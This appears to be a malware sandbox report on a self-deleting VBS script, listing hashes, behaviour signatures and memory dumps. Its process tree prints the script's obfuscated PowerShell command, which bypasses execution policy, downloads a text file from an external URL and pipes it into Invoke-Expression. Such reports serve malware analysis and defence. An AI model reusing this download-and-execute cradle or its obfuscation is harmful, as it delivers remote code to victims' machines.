Overview

overview

8

Static

static

1

ed660ae4e1...b1.vbs

windows7-x64

7

ed660ae4e1...b1.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    31s
  • max time network
    34s
  • platform
    windows7_x64
  • resource
    win7-20230621-en
  • resource tags

    arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system
  • submitted
    30/06/2023, 01:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ed660ae4e1ff7e57c133b6d3d0a72bd41d6058cd2fe827466afd9d1d372fd4b1.vbs

  • Size

    11KB

  • MD5

    a6ecc90056e3e910c3b39624f708eb66

  • SHA1

    72f6cdcdcf0114e50061a40078bc7cc60f7cd95e

  • SHA256

    ed660ae4e1ff7e57c133b6d3d0a72bd41d6058cd2fe827466afd9d1d372fd4b1

  • SHA512

    222c55a3bb009be3f13165db81297043135c89454fdcbafdd0864af90741272b94d127c525263766198165eeecba1749237cab5803e6442de995193b50278b7f

  • SSDEEP

    192:Npy58UoGL9i5lB5HQmpikw1BRKsyj0B41HCAEcYnd5DvxR7Nl5:Cdps6mFqbKlv2zh

Score
7/10

Malware Config

Signatures

  • Deletes itself 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ed660ae4e1ff7e57c133b6d3d0a72bd41d6058cd2fe827466afd9d1d372fd4b1.vbs"
    1⤵
    • Deletes itself
    • Suspicious use of WriteProcessMemory
    PID:1344
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EP Byps $zWnXt = 'Iwr'; $VvWeR = 'cff66d08-d3f8-42db-911c-ce670399a441.usrfiles.com/ugd/cff66d_18181a7547224af09ee0503331621ea6.txt'; &$zWnXt -Uri $VvWeR | .('{1}{0}'-f'calc','i').replace('calc','eX')
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:924

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/924-58-0x000000001B390000-0x000000001B672000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/924-59-0x0000000002010000-0x0000000002018000-memory.dmp

    Filesize

    32KB

    Download

  • memory/924-60-0x0000000002800000-0x0000000002880000-memory.dmp

    Filesize

    512KB

    Download

  • memory/924-61-0x0000000002800000-0x0000000002880000-memory.dmp

    Filesize

    512KB

    Download

  • memory/924-62-0x0000000002800000-0x0000000002880000-memory.dmp

    Filesize

    512KB

    Download

  • memory/924-63-0x0000000002800000-0x0000000002880000-memory.dmp

    Filesize

    512KB

    Download